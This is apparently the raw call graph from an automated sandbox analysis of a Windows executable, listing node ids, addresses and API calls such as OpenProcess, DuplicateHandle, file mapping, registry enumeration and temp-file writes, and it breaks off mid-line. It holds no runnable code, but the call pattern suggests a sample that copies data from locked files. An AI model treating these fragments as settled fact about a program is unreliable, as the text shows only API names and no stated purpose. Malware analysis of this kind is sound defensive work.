38991 414c2e 14 API calls 38990->38991 38992 40e63f 38991->38992 38993 409d1f 6 API calls 38992->38993 38994 40e658 38993->38994 39004 409b98 GetFileAttributesW 38994->39004 38996 40e667 38997 409d1f 6 API calls 38996->38997 38999 40e680 38996->38999 38997->38999 39005 409b98 GetFileAttributesW 38999->39005 39000 40e68f 39001 40c2d8 39000->39001 39006 40e4b2 39000->39006 39001->38929 39001->38930 39003->38985 39004->38996 39005->39000 39027 40e01e 39006->39027 39008 40e593 39009 40e5b0 39008->39009 39010 40e59c DeleteFileW 39008->39010 39011 40b04b ??3@YAXPAX 39009->39011 39010->39009 39013 40e5bb 39011->39013 39012 40e521 39012->39008 39050 40e175 39012->39050 39015 40e5c4 CloseHandle 39013->39015 39016 40e5cc 39013->39016 39015->39016 39018 40b633 free 39016->39018 39017 40e573 39020 40e584 39017->39020 39021 40e57c CloseHandle 39017->39021 39019 40e5db 39018->39019 39023 40b633 free 39019->39023 39093 40b1ab free free 39020->39093 39021->39020 39022 40e540 39022->39017 39070 40e2ab 39022->39070 39025 40e5e3 39023->39025 39025->39001 39028 406214 22 API calls 39027->39028 39029 40e03c 39028->39029 39030 40e16b 39029->39030 39031 40dd85 74 API calls 39029->39031 39030->39012 39032 40e06b 39031->39032 39032->39030 39033 40afcf ??2@YAPAXI ??3@YAXPAX 39032->39033 39034 40e08d OpenProcess 39033->39034 39035 40e0a4 GetCurrentProcess DuplicateHandle 39034->39035 39039 40e152 39034->39039 39036 40e0d0 GetFileSize 39035->39036 39037 40e14a CloseHandle 39035->39037 39040 409a45 GetTempPathW GetWindowsDirectoryW GetTempFileNameW 39036->39040 39037->39039 39038 40e160 39042 40b04b ??3@YAXPAX 39038->39042 39039->39038 39041 406214 22 API calls 39039->39041 39043 40e0ea 39040->39043 39041->39038 39042->39030 39044 4096dc CreateFileW 39043->39044 39045 40e0f1 CreateFileMappingW 39044->39045 39046 40e140 CloseHandle CloseHandle 39045->39046 39047 40e10b MapViewOfFile 39045->39047 39046->39037 39048 40e13b CloseHandle 39047->39048 39049 40e11f WriteFile UnmapViewOfFile 39047->39049 39048->39046 39049->39048 39051 40e18c 39050->39051 39052 406b90 11 API calls 39051->39052 39053 40e19f 39052->39053 39054 40e1a7 memset 39053->39054 39055 40e299 39053->39055 39060 40e1e8 39054->39060 39056 4069a3 ??3@YAXPAX free 39055->39056 39057 40e2a4 39056->39057 39057->39022 39058 406e8f 13 API calls 39058->39060 39059 406b53 SetFilePointerEx ReadFile 39059->39060 39060->39058 39060->39059 39061 40dd50 _wcsicmp 39060->39061 39062 40e283 39060->39062 39066 40742e 8 API calls 39060->39066 39067 40aae3 wcslen wcslen _memicmp 39060->39067 39068 40e244 _snwprintf 39060->39068 39061->39060 39063 40e291 39062->39063 39064 40e288 free 39062->39064 39065 40aa04 free 39063->39065 39064->39063 39065->39055 39066->39060 39067->39060 39069 40a8d0 7 API calls 39068->39069 39069->39060 39071 40e2c2 39070->39071 39072 406b90 11 API calls 39071->39072 39083 40e2d3 39072->39083 39073 40e4a0 39074 4069a3 ??3@YAXPAX free 39073->39074 39076 40e4ab 39074->39076 39075 406e8f 13 API calls 39075->39083 39076->39022 39077 406b53 SetFilePointerEx ReadFile 39077->39083 39078 40e489 39079 40aa04 free 39078->39079 39080 40e491 39079->39080 39080->39073 39082 40e497 free 39080->39082 39081 40dd50 _wcsicmp 39081->39083 39082->39073 39083->39073 39083->39075 39083->39077 39083->39078 39083->39081 39084 40dd50 _wcsicmp 39083->39084 39087 40742e 8 API calls 39083->39087 39088 40e3e0 memcpy 39083->39088 39089 40e3fb memcpy 39083->39089 39090 40e3b3 wcschr 39083->39090 39091 40e416 memcpy 39083->39091 39092 40e431 memcpy 39083->39092 39085 40e376 memset 39084->39085 39086 40aa29 6 API calls 39085->39086 39086->39083 39087->39083 39088->39083 39089->39083 39090->39083 39091->39083 39092->39083 39093->39008 39095 40a980 39094->39095 39096 40a995 _wcsicmp 39095->39096 39097 40a99c wcscmp 39095->39097 39098 40a8bb 39095->39098 39096->39095 39097->39095 39098->38949 39098->38950 39099->38953 39101 40aa23 RegEnumValueW 39100->39101 39101->38962 39101->38963 39103 405335 39102->39103 39104 40522a 39102->39104 39103->38547 39105 40b2cc 27 API calls 39104->39105 39106 405234 39105->39106 39107 40a804 8 API calls 39106->39107 39108 40523a 39107->39108 39147 40b273 39108->39147 39110 405248 _mbscpy _mbscat GetProcAddress 39111 40b273 27 API calls 39110->39111 39112 405279 39111->39112 39150 405211 GetProcAddress 39112->39150 39114 405282 39115 40b273 27 API calls 39114->39115 39116 40528f 39115->39116 39151 405211 GetProcAddress 39116->39151 39118 405298 39119 40b273 27 API calls 39118->39119 39120 4052a5 39119->39120 39152 405211 GetProcAddress 39120->39152 39122 4052ae 39123 40b273 27 API calls 39122->39123 39124 4052bb 39123->39124 39153 405211 GetProcAddress 39124->39153 39126 4052c4 39127 40b273 27 API calls 39126->39127 39128 4052d1 39127->39128 39154 405211 GetProcAddress 39128->39154 39130 4052da 39131 40b273 27 API calls 39130->39131 39132 4052e7 39131->39132 39155 405211 GetProcAddress 39132->39155 39134 4052f0 39135 40b273 27 API calls 39134->39135 39136 4052fd 39135->39136 39156 405211 GetProcAddress 39136->39156 39138 405306 39139 40b273 27 API calls 39138->39139 39140 405313 39139->39140 39157 405211 GetProcAddress 39140->39157 39142 40531c 39143 40b273 27 API calls 39142->39143 39144 405329 39143->39144 39158 405211 GetProcAddress 39144->39158 39146 405332 39146->39103 39148 40b58d 27 API calls 39147->39148 39149 40b18c 39148->39149 39149->39110 39150->39114 39151->39118 39152->39122 39153->39126 39154->39130 39155->39134 39156->39138 39157->39142 39158->39146 39160 40440c FreeLibrary 39159->39160 39161 40436d 39160->39161 39162 40a804 8 API calls 39161->39162 39163 404377 39162->39163 39164 404383 39163->39164 39165 404405 39163->39165 39166 40b273 27 API calls 39164->39166 39165->38559 39165->38561 39165->38562 39167 40438d GetProcAddress 39166->39167 39168 40b273 27 API calls 39167->39168 39169 4043a7 GetProcAddress 39168->39169 39170 40b273 27 API calls 39169->39170 39171 4043ba GetProcAddress 39170->39171 39172 40b273 27 API calls 39171->39172 39173 4043ce GetProcAddress 39172->39173 39174 40b273 27 API calls 39173->39174 39175 4043e2 GetProcAddress 39174->39175 39176 4043f1 39175->39176 39177 4043f7 39176->39177 39178 40440c FreeLibrary 39176->39178 39177->39165 39178->39165 39180 404413 FreeLibrary 39179->39180 39181 40441e 39179->39181 39180->39181 39181->38576 39182->38572 39184 40447e 39183->39184 39185 40442e 39183->39185 39184->38572 39186 40b2cc 27 API calls 39185->39186 39187 404438 39186->39187 39188 40a804 8 API calls 39187->39188 39189 40443e 39188->39189 39190 404445 39189->39190 39191 404467 39189->39191 39192 40b273 27 API calls 39190->39192 39191->39184 39194 404475 FreeLibrary 39191->39194 39193 40444f GetProcAddress 39192->39193 39193->39191 39195 404460 39193->39195 39194->39184 39195->39191 39197 4135f6 39196->39197 39198 4135eb FreeLibrary 39196->39198 39197->38579 39198->39197 39200 4449c4 39199->39200 39201 444a52 39199->39201 39202 40b2cc 27 API calls 39200->39202 39201->38596 39201->38597 39203 4449cb 39202->39203 39204 40a804 8 API calls 39203->39204 39205 4449d1 39204->39205 39206 40b273 27 API calls 39205->39206 39207 4449dc GetProcAddress 39206->39207 39208 40b273 27 API calls 39207->39208 39209 4449f3 GetProcAddress 39208->39209 39210 40b273 27 API calls 39209->39210 39211 444a04 GetProcAddress 39210->39211 39212 40b273 27 API calls 39211->39212 39213 444a15 GetProcAddress 39212->39213 39214 40b273 27 API calls 39213->39214 39215 444a26 GetProcAddress 39214->39215 39216 40b273 27 API calls 39215->39216 39217 444a37 GetProcAddress 39216->39217 39218 40b273 27 API calls 39217->39218 39219 444a48 GetProcAddress 39218->39219 39219->39201 39220->38607 39221->38607 39222->38607 39223->38607 39224->38598 39226 403a29 39225->39226 39240 403bed memset memset 39226->39240 39228 403ae7 39253 40b1ab free free 39228->39253 39229 403a3f memset 39233 403a2f 39229->39233 39231 403aef 39231->38614 39232 409d1f 6 API calls 39232->39233 39233->39228 39233->39229 39233->39232 39234 409b98 GetFileAttributesW 39233->39234 39235 40a8d0 7 API calls 39233->39235 39234->39233 39235->39233 39237 40a051 GetFileTime CloseHandle 39236->39237 39238 4039ca CompareFileTime 39236->39238 39237->39238 39238->38614 39239->38615 39241 414c2e 14 API calls 39240->39241 39242 403c38 39241->39242 39243 409719 2 API calls 39242->39243 39244 403c3f wcscat 39243->39244 39245 414c2e 14 API calls 39244->39245 39246 403c61 39245->39246 39247 409719 2 API calls 39246->39247 39248 403c68 wcscat 39247->39248 39254 403af5 39248->39254 39251 403af5 20 API calls 39252 403c95 39251->39252 39252->39233 39253->39231 39255 403b02 39254->39255 39256 40ae18 9 API calls 39255->39256 39265 403b37 39256->39265 39257 403bdb 39259 40aebe FindClose 39257->39259 39258 40add4 wcscmp wcscmp 39258->39265 39260 403be6 39259->39260 39260->39251 39261 40a8d0 7 API calls 39261->39265 39262 40ae18 9 API calls 39262->39265 39263 40ae51 9 API calls 39263->39265 39264 40aebe FindClose 39264->39265 39265->39257 39265->39258 39265->39261 39265->39262 39265->39263 39265->39264 39267 409d1f 6 API calls 39266->39267 39268 404190 39267->39268 39281 409b98 GetFileAttributesW 39268->39281 39270 40419c 39271 4041a7 6 API calls 39270->39271 39272 40435c 39270->39272 39273 40424f 39271->39273 39272->38636 39273->39272 39275 40425e memset 39273->39275 39277 409d1f 6 API calls 39273->39277 39278 40a8ab 9 API calls 39273->39278 39282 414842 39273->39282 39275->39273 39276 404296 wcscpy 39275->39276 39276->39273 39277->39273 39279 4042b6 memset memset _snwprintf wcscpy 39278->39279 39279->39273 39280->38640 39281->39270 39285 41443e 39282->39285 39284 414866 39284->39273 39286 41444b 39285->39286 39287 414451 39286->39287 39288 4144a3 GetPrivateProfileStringW 39286->39288 39289 414491 39287->39289 39290 414455 wcschr 39287->39290 39288->39284 39292 414495 WritePrivateProfileStringW 39289->39292 39290->39289 39291 414463 _snwprintf 39290->39291 39291->39292 39292->39284 39293->38645 39295 40b2cc 27 API calls 39294->39295 39296 409615 39295->39296 39297 409d1f 6 API calls 39296->39297 39298 409625 39297->39298 39323 409b98 GetFileAttributesW 39298->39323 39300 409634 39301 409648 39300->39301 39324 4091b8 memset 39300->39324 39303 40b2cc 27 API calls 39301->39303 39305 408801 39301->39305 39304 40965d 39303->39304 39306 409d1f 6 API calls 39304->39306 39305->38648 39305->38692 39307 40966d 39306->39307 39376 409b98 GetFileAttributesW 39307->39376 39309 40967c 39309->39305 39310 409681 39309->39310 39377 409529 72 API calls 39310->39377 39312 409690 39312->39305 39313->38670 39314->38692 39315->38675 39316->38692 39317->38680 39323->39300 39378 40a6e6 WideCharToMultiByte 39324->39378 39326 409202 39379 444432 39326->39379 39329 40b273 27 API calls 39330 409236 39329->39330 39425 438552 39330->39425 39333 409383 39335 40b273 27 API calls 39333->39335 39337 409399 39335->39337 39336 409254 39338 40937b 39336->39338 39446 4253cf 17 API calls 39336->39446 39339 438552 133 API calls 39337->39339 39450 424f26 122 API calls 39338->39450 39358 4093a3 39339->39358 39342 409267 39447 4253cf 17 API calls 39342->39447 39343 4094ff 39454 443d90 39343->39454 39346 4251c4 136 API calls 39346->39358 39348 409507 39356 40951d 39348->39356 39474 408f2f 77 API calls 39348->39474 39350 4093df 39453 424f26 122 API calls 39350->39453 39352 4253cf 17 API calls 39352->39358 39356->39301 39358->39343 39358->39346 39358->39350 39358->39352 39360 4093e4 39358->39360 39451 4253af 17 API calls 39360->39451 39366 4093ed 39452 4253af 17 API calls 39366->39452 39369 4093f9 39369->39350 39370 409409 memcmp 39369->39370 39370->39350 39371 409421 memcmp 39370->39371 39372 4094a4 memcmp 39371->39372 39373 409435 39371->39373 39372->39350 39373->39350 39376->39309 39377->39312 39378->39326 39475 4438b5 39379->39475 39381 44444c 39387 409215 39381->39387 39489 415a6d 39381->39489 39384 444486 39386 4444b9 memcpy 39384->39386 39424 4444a4 39384->39424 39385 44469e 39385->39387 39389 443d90 110 API calls 39385->39389 39493 415258 39386->39493 39387->39329 39387->39356 39389->39387 39390 444524 39391 444541 39390->39391 39392 44452a 39390->39392 39496 444316 39391->39496 39530 416935 39392->39530 39396 444316 18 API calls 39397 444563 39396->39397 39398 444316 18 API calls 39397->39398 39399 44456f 39398->39399 39400 444316 18 API calls 39399->39400 39401 44457f 39400->39401 39401->39424 39510 432d4e 39401->39510 39543 4442e6 11 API calls 39424->39543 39544 438460 39425->39544 39427 409240 39427->39333 39428 4251c4 39427->39428 39556 424f07 39428->39556 39430 4251e4 39431 4251f7 39430->39431 39432 4251e8 39430->39432 39564 4250f8 39431->39564 39563 4446ea 11 API calls 39432->39563 39434 4251f2 39434->39336 39436 425209 39439 425249 39436->39439 39442 4250f8 126 API calls 39436->39442 39443 425287 39436->39443 39572 4384e9 134 API calls 39436->39572 39573 424f74 123 API calls 39436->39573 39439->39443 39574 424ff0 13 API calls 39439->39574 39442->39436 39576 415c7d 16 API calls 39443->39576 39446->39342 39450->39333 39451->39366 39452->39369 39453->39343 39455 443da3 39454->39455 39473 443db6 39454->39473 39577 41707a 11 API calls 39455->39577 39457 443da8 39458 443dac 39457->39458 39460 443dbc 39457->39460 39578 4446ea 11 API calls 39458->39578 39579 4300e8 memset memset memcpy 39460->39579 39473->39348 39474->39356 39476 4438d0 39475->39476 39482 4438c9 39475->39482 39477 415378 memcpy memcpy 39476->39477 39478 4438d5 39477->39478 39479 4154e2 10 API calls 39478->39479 39480 443906 39478->39480 39478->39482 39479->39480 39481 443970 memset 39480->39481 39480->39482 39484 44398b 39481->39484 39482->39381 39483 415700 10 API calls 39486 4439c0 39483->39486 39485 41975c 10 API calls 39484->39485 39487 4439a0 39484->39487 39485->39487 39486->39482 39488 418981 10 API calls 39486->39488 39487->39482 39487->39483 39488->39482 39490 415a77 39489->39490 39491 415a8d 39490->39491 39492 415a7e memset 39490->39492 39491->39384 39492->39491 39494 4438b5 11 API calls 39493->39494 39495 41525d 39494->39495 39495->39390 39497 444328 39496->39497 39498 444423 39497->39498 39499 44434e 39497->39499 39500 4446ea 11 API calls 39498->39500 39501 432d4e memset memset memcpy 39499->39501 39507 444381 39500->39507 39502 44435a 39501->39502 39504 444375 39502->39504 39509 44438b 39502->39509 39503 432d4e memset memset memcpy 39505 4443ec 39503->39505 39506 416935 16 API calls 39504->39506 39505->39507 39508 416935 16 API calls 39505->39508 39506->39507 39507->39396 39508->39507 39509->39503 39511 432d58 39510->39511 39513 432d65 39510->39513 39512 432cc4 memset memset memcpy 39511->39512 39512->39513 39531 41693e 39530->39531 39534 41698e 39530->39534 39532 41694c 39531->39532 39533 422fd1 memset 39531->39533 39532->39534 39535 4165a0 11 API calls 39532->39535 39533->39532 39534->39424 39536 416972 39535->39536 39536->39534 39537 422b84 15 API calls 39536->39537 39537->39534 39543->39385 39545 41703f 11 API calls 39544->39545 39546 43847a 39545->39546 39547 43848a 39546->39547 39548 43847e 39546->39548 39550 438270 133 API calls 39547->39550 39549 4446ea 11 API calls 39548->39549 39552 438488 39549->39552 39551 4384aa 39550->39551 39551->39552 39553 424f26 122 API calls 39551->39553 39552->39427 39554 4384bb 39553->39554 39555 438270 133 API calls 39554->39555 39555->39552 39557 424f1f 39556->39557 39558 424f0c 39556->39558 39560 424eea 11 API calls 39557->39560 39559 416760 11 API calls 39558->39559 39561 424f18 39559->39561 39562 424f24 39560->39562 39561->39430 39562->39430 39563->39434 39565 425108 39564->39565 39571 42510d 39564->39571 39566 424f74 123 API calls 39565->39566 39566->39571 39567 42569b 124 API calls 39568 42516e 39567->39568 39570 415c7d 16 API calls 39568->39570 39569 425115 39569->39436 39570->39569 39571->39567 39571->39569 39572->39436 39573->39436 39576->39434 39577->39457 39578->39473 39610 413f4f 39583->39610 39586 413f37 K32GetModuleFileNameExW 39587 413f4a 39586->39587 39587->38708 39589 41396c wcschr 39588->39589 39591 413969 wcscpy 39588->39591 39589->39591 39592 41398e 39589->39592 39593 413a3a 39591->39593 39615 4097f7 wcslen wcslen _memicmp 39592->39615 39593->38708 39595 41399a 39596 4139a4 memset 39595->39596 39597 4139e6 39595->39597 39616 409dd5 GetWindowsDirectoryW wcscpy 39596->39616 39599 413a31 wcscpy 39597->39599 39600 4139ec memset 39597->39600 39599->39593 39617 409dd5 GetWindowsDirectoryW wcscpy 39600->39617 39601 4139c9 wcscpy wcscat 39601->39593 39603 413a11 memcpy wcscat 39603->39593 39605 413cb0 GetModuleHandleW 39604->39605 39606 413cda 39604->39606 39605->39606 39607 413cbf GetProcAddress 39605->39607 39608 413ce3 GetProcessTimes 39606->39608 39609 413cf6 39606->39609 39607->39606 39608->38710 39609->38710 39611 413f2f 39610->39611 39612 413f54 39610->39612 39611->39586 39611->39587 39613 40a804 8 API calls 39612->39613 39614 413f5f GetProcAddress GetProcAddress GetProcAddress GetProcAddress GetProcAddress 39613->39614 39614->39611 39615->39595 39616->39601 39617->39603 39618->38731 39619->38753 39621 409cf9 GetVersionExW 39620->39621 39622 409d0a 39620->39622 39621->39622 39622->38760 39622->38763 39623->38767 39624->38769 39625->38835 39627 40bba5 39626->39627 39674 40cc26 39627->39674 39630 40bd4b 39695 40cc0c 39630->39695 39635 40b2cc 27 API calls 39636 40bbef 39635->39636 39702 40ccf0 _wcsicmp 39636->39702 39638 40bbf5 39638->39630 39703 40ccb4 6 API calls 39638->39703 39640 40bc26 39641 40cf04 17 API calls 39640->39641 39642 40bc2e 39641->39642 39643 40bd43 39642->39643 39644 40b2cc 27 API calls 39642->39644 39645 40cc0c 4 API calls 39643->39645 39646 40bc40 39644->39646 39645->39630 39704 40ccf0 _wcsicmp 39646->39704 39648 40bc46 39648->39643 39649 40bc61 memset memset WideCharToMultiByte 39648->39649 39705 40103c strlen 39649->39705 39651 40bcc0 39652 40b273 27 API calls 39651->39652 39653 40bcd0 memcmp 39652->39653 39653->39643 39654 40bce2 39653->39654 39655 404423 37 API calls 39654->39655 39656 40bd10 39655->39656 39656->39643 39657 40bd3a LocalFree 39656->39657 39658 40bd1f memcpy 39656->39658 39657->39643 39658->39657 39659->38850 39661 409a74 GetTempFileNameW 39660->39661 39662 409a66 GetWindowsDirectoryW 39660->39662 39661->38848 39662->39661 39663->38885 39664->38885 39665->38885 39666->38885 39667->38885 39668->38885 39669->38885 39670->38885 39671->38885 39672->38860 39673->38882 39706 4096c3 CreateFileW 39674->39706 39676 40cc34 39677 40cc3d GetFileSize 39676->39677 39678 40bbca 39676->39678 39679 40afcf 2 API calls 39677->39679 39678->39630 39686 40cf04 39678->39686 39680 40cc64 39679->39680 39707 40a2ef ReadFile 39680->39707 39682 40cc71 39708 40ab4a MultiByteToWideChar 39682->39708 39684 40cc95 CloseHandle 39685 40b04b ??3@YAXPAX 39684->39685 39685->39678 39687 40b633 free 39686->39687 39688 40cf14 39687->39688 39714 40b1ab free free 39688->39714 39690 40bbdd 39690->39630 39690->39635 39691 40cf1b 39691->39690 39693 40cfef 39691->39693 39715 40cd4b 39691->39715 39694 40cd4b 14 API calls 39693->39694 39694->39690 39696 40b633 free 39695->39696 39697 40cc15 39696->39697 39698 40aa04 free 39697->39698 39699 40cc1d 39698->39699 39764 40b1ab free free 39699->39764 39701 40b7d4 memset CreateFileW 39701->38841 39701->38842 39702->39638 39703->39640 39704->39648 39705->39651 39706->39676 39707->39682 39709 40ab6b 39708->39709 39713 40ab93 39708->39713 39710 40a9ce 4 API calls 39709->39710 39711 40ab74 39710->39711 39712 40ab7c MultiByteToWideChar 39711->39712 39712->39713 39713->39684 39714->39691 39716 40cd7b 39715->39716 39749 40aa29 39716->39749 39718 40cef5 39719 40aa04 free 39718->39719 39720 40cefd 39719->39720 39720->39691 39722 40aa29 6 API calls 39723 40ce1d 39722->39723 39724 40aa29 6 API calls 39723->39724 39725 40ce3e 39724->39725 39726 40ce6a 39725->39726 39757 40abb7 wcslen memmove 39725->39757 39727 40ce9f 39726->39727 39760 40abb7 wcslen memmove 39726->39760 39730 40a8d0 7 API calls 39727->39730 39733 40ceb5 39730->39733 39731 40ce56 39758 40aa71 wcslen 39731->39758 39732 40ce8b 39761 40aa71 wcslen 39732->39761 39739 40a8d0 7 API calls 39733->39739 39736 40ce5e 39759 40abb7 wcslen memmove 39736->39759 39737 40ce93 39762 40abb7 wcslen memmove 39737->39762 39741 40cecb 39739->39741 39763 40d00b malloc memcpy free free 39741->39763 39743 40cedd 39744 40aa04 free 39743->39744 39745 40cee5 39744->39745 39746 40aa04 free 39745->39746 39747 40ceed 39746->39747 39748 40aa04 free 39747->39748 39748->39718 39750 40aa33 39749->39750 39756 40aa63 39749->39756 39751 40aa44 39750->39751 39752 40aa38 wcslen 39750->39752 39753 40a9ce malloc memcpy free free 39751->39753 39752->39751 39754 40aa4d 39753->39754 39755 40aa51 memcpy 39754->39755 39754->39756 39755->39756 39756->39718 39756->39722 39757->39731 39758->39736 39759->39726 39760->39732 39761->39737 39762->39727 39763->39743 39764->39701 39765->38900 39766->38908 37675 44dea5 37676 44deb5 FreeLibrary 37675->37676 37677 44dec3 37675->37677 37676->37677 39776 4148b6 FindResourceW 39777 4148cf SizeofResource 39776->39777 39780 4148f9 39776->39780 39778 4148e0 LoadResource 39777->39778 39777->39780 39779 4148ee LockResource 39778->39779 39778->39780 39779->39780 37851 415304 free 39781 441b3f 39791 43a9f6 39781->39791 39783 441b61 39964 4386af memset 39783->39964 39785 44189a 39786 4418e2 39785->39786 39788 442bd4 39785->39788 39787 4418ea 39786->39787 39965 4414a9 12 API calls 39786->39965 39788->39787 39966 441409 memset 39788->39966 39792 43aa20 39791->39792 39793 43aadf 39791->39793 39792->39793 39794 43aa34 memset 39792->39794 39793->39783 39795 43aa56 39794->39795 39796 43aa4d 39794->39796 39967 43a6e7 39795->39967 39975 42c02e memset 39796->39975 39801 43aad3 39977 4169a7 11 API calls 39801->39977 39802 43aaae 39802->39793 39802->39801 39817 43aae5 39802->39817 39803 43ac18 39806 43ac47 39803->39806 39979 42bbd5 memcpy memcpy memcpy memset memcpy 39803->39979 39807 43aca8 39806->39807 39980 438eed 16 API calls 39806->39980 39810 43acd5 39807->39810 39982 4233ae 11 API calls 39807->39982 39983 423426 11 API calls 39810->39983 39811 43ac87 39981 4233c5 16 API calls 39811->39981 39815 43ace1 39984 439811 162 API calls 39815->39984 39816 43a9f6 160 API calls 39816->39817 39817->39793 39817->39803 39817->39816 39978 439bbb 22 API calls 39817->39978 39819 43acfd 39824 43ad2c 39819->39824 39985 438eed 16 API calls 39819->39985 39821 43ad19 39986 4233c5 16 API calls 39821->39986 39822 43ad58 39987 44081d 162 API calls 39822->39987 39824->39822 39828 43add9 39824->39828 39827 43ae3a memset 39829 43ae73 39827->39829 39828->39828 39991 423426 11 API calls 39828->39991 39992 42e1c0 146 API calls 39829->39992 39830 43adab 39989 438c4e 162 API calls 39830->39989 39833 43ad6c 39833->39793 39833->39830 39988 42370b memset memcpy memset 39833->39988 39835 43adcc 39990 440f84 12 API calls 39835->39990 39836 43ae96 39993 42e1c0 146 API calls 39836->39993 39839 43aea8 39840 43aec1 39839->39840 39994 42e199 146 API calls 39839->39994 39841 43af00 39840->39841 39995 42e1c0 146 API calls 39840->39995 39841->39793 39845 43af1a 39841->39845 39846 43b3d9 39841->39846 39996 438eed 16 API calls 39845->39996 39852 43b3f6 39846->39852 39854 43b4c8 39846->39854 39848 43b60f 39848->39793 40055 4393a5 17 API calls 39848->40055 39850 43af2f 39997 4233c5 16 API calls 39850->39997 40037 432878 12 API calls 39852->40037 39853 43af51 39998 423426 11 API calls 39853->39998 39856 43b4f2 39854->39856 40043 42bbd5 memcpy memcpy memcpy memset memcpy 39854->40043 40044 43a76c 21 API calls 39856->40044 39858 43af7d 39999 423426 11 API calls 39858->39999 39862 43b529 40045 44081d 162 API calls 39862->40045 39863 43b462 40039 423330 11 API calls 39863->40039 39864 43af94 40000 423330 11 API calls 39864->40000 39868 43afca 40001 423330 11 API calls 39868->40001 39869 43b47e 39873 43b497 39869->39873 40040 42374a memcpy memset memcpy memcpy memcpy 39869->40040 39870 43b544 39874 43b55c 39870->39874 40046 42c02e memset 39870->40046 39871 43b428 39871->39863 40038 432b60 16 API calls 39871->40038 40041 4233ae 11 API calls 39873->40041 40047 43a87a 162 API calls 39874->40047 39875 43afdb 40002 4233ae 11 API calls 39875->40002 39881 43b56c 39884 43b58a 39881->39884 40048 423330 11 API calls 39881->40048 39882 43b4b1 40042 423399 11 API calls 39882->40042 39883 43afee 40003 44081d 162 API calls 39883->40003 40049 440f84 12 API calls 39884->40049 39886 43b4c1 40051 42db80 162 API calls 39886->40051 39891 43b592 40050 43a82f 16 API calls 39891->40050 39894 43b5b4 40052 438c4e 162 API calls 39894->40052 39896 43b5cf 40053 42c02e memset 39896->40053 39898 43b005 39898->39793 39902 43b01f 39898->39902 40004 42d836 162 API calls 39898->40004 39899 43b1ef 40014 4233c5 16 API calls 39899->40014 39902->39899 40012 423330 11 API calls 39902->40012 40013 42d71d 162 API calls 39902->40013 39903 43b212 40015 423330 11 API calls 39903->40015 39904 43b087 40005 4233ae 11 API calls 39904->40005 39905 43add4 39905->39848 40054 438f86 16 API calls 39905->40054 39909 43b22a 40016 42ccb5 11 API calls 39909->40016 39912 43b23f 40017 4233ae 11 API calls 39912->40017 39913 43b10f 40008 423330 11 API calls 39913->40008 39915 43b257 40018 4233ae 11 API calls 39915->40018 39919 43b129 40009 4233ae 11 API calls 39919->40009 39920 43b26e 40019 4233ae 11 API calls 39920->40019 39923 43b09a 39923->39913 40006 42cc15 19 API calls 39923->40006 40007 4233ae 11 API calls 39923->40007 39924 43b282 40020 43a87a 162 API calls 39924->40020 39926 43b13c 40010 440f84 12 API calls 39926->40010 39928 43b29d 40021 423330 11 API calls 39928->40021 39931 43b15f 40011 4233ae 11 API calls 39931->40011 39932 43b2af 39934 43b2b8 39932->39934 39935 43b2ce 39932->39935 40022 4233ae 11 API calls 39934->40022 40023 440f84 12 API calls 39935->40023 39938 43b2c9 40025 4233ae 11 API calls 39938->40025 39939 43b2da 40024 42370b memset memcpy memset 39939->40024 39942 43b2f9 40026 423330 11 API calls 39942->40026 39944 43b30b 40027 423330 11 API calls 39944->40027 39946 43b325 40028 423399 11 API calls 39946->40028 39948 43b332 40029 4233ae 11 API calls 39948->40029 39950 43b354 40030 423399 11 API calls 39950->40030 39952 43b364 40031 43a82f 16 API calls 39952->40031 39954 43b370 40032 42db80 162 API calls 39954->40032 39956 43b380 40033 438c4e 162 API calls 39956->40033 39958 43b39e 40034 423399 11 API calls 39958->40034 39960 43b3ae 40035 43a76c 21 API calls 39960->40035 39962 43b3c3 40036 423399 11 API calls 39962->40036 39964->39785 39965->39787 39966->39788 39968 43a6f5 39967->39968 39969 43a765 39967->39969 39968->39969 40056 42a115 39968->40056 39969->39793 39976 4397fd memset 39969->39976 39973 43a73d 39973->39969 39974 42a115 146 API calls 39973->39974 39974->39969 39975->39795 39976->39802 39977->39793 39978->39817 39979->39806 39980->39811 39981->39807 39982->39810 39983->39815 39984->39819 39985->39821 39986->39824 39987->39833 39988->39830 39989->39835 39990->39905 39991->39827 39992->39836 39993->39839 39994->39840 39995->39840 39996->39850 39997->39853 39998->39858 39999->39864 40000->39868 40001->39875 40002->39883 40003->39898 40004->39904 40005->39923 40006->39923 40007->39923 40008->39919 40009->39926 40010->39931 40011->39902 40012->39902 40013->39902 40014->39903 40015->39909 40016->39912 40017->39915 40018->39920 40019->39924 40020->39928 40021->39932 40022->39938 40023->39939 40024->39938 40025->39942 40026->39944 40027->39946 40028->39948 40029->39950 40030->39952 40031->39954 40032->39956 40033->39958 40034->39960 40035->39962 40036->39905 40037->39871 40038->39863 40039->39869 40040->39873 40041->39882 40042->39886 40043->39856 40044->39862 40045->39870 40046->39874 40047->39881 40048->39884 40049->39891 40050->39886 40051->39894 40052->39896 40053->39905 40054->39848 40055->39793 40057 42a175 40056->40057 40059 42a122 40056->40059 40057->39969 40062 42b13b 146 API calls 40057->40062 40059->40057 40060 42a115 146 API calls 40059->40060 40063 43a174 40059->40063 40087 42a0a8 146 API calls 40059->40087 40060->40059 40062->39973 40077 43a196 40063->40077 40078 43a19e 40063->40078 40064 43a306 40064->40077 40107 4388c4 14 API calls 40064->40107 40067 42a115 146 API calls 40067->40078 40069 43a642 40069->40077 40111 4169a7 11 API calls 40069->40111 40073 43a635 40110 42c02e memset 40073->40110 40077->40059 40078->40064 40078->40067 40078->40077 40088 42ff8c 40078->40088 40096 415a91 40078->40096 40100 4165ff 40078->40100 40103 439504 13 API calls 40078->40103 40104 4312d0 146 API calls 40078->40104 40105 42be4c memcpy memcpy memcpy memset memcpy 40078->40105 40106 43a121 11 API calls 40078->40106 40080 42bf4c 14 API calls 40082 43a325 40080->40082 40081 4169a7 11 API calls 40081->40082 40082->40069 40082->40073 40082->40077 40082->40080 40082->40081 40083 42b5b5 memset memcpy 40082->40083 40086 4165ff 11 API calls 40082->40086 40108 42b63e 14 API calls 40082->40108 40109 42bfcf memcpy 40082->40109 40083->40082 40086->40082 40087->40059 40112 43817e 40088->40112 40090 42ff9d 40090->40078 40091 42ff99 40091->40090 40092 42ffe3 40091->40092 40093 42ffd0 40091->40093 40117 4169a7 11 API calls 40092->40117 40116 4169a7 11 API calls 40093->40116 40097 415a9d 40096->40097 40098 415ab3 40097->40098 40099 415aa4 memset 40097->40099 40098->40078 40099->40098 40268 4165a0 40100->40268 40103->40078 40104->40078 40105->40078 40106->40078 40107->40082 40108->40082 40109->40082 40110->40069 40111->40077 40113 438187 40112->40113 40115 438192 40112->40115 40118 4380f6 40113->40118 40115->40091 40116->40090 40117->40090 40120 43811f 40118->40120 40119 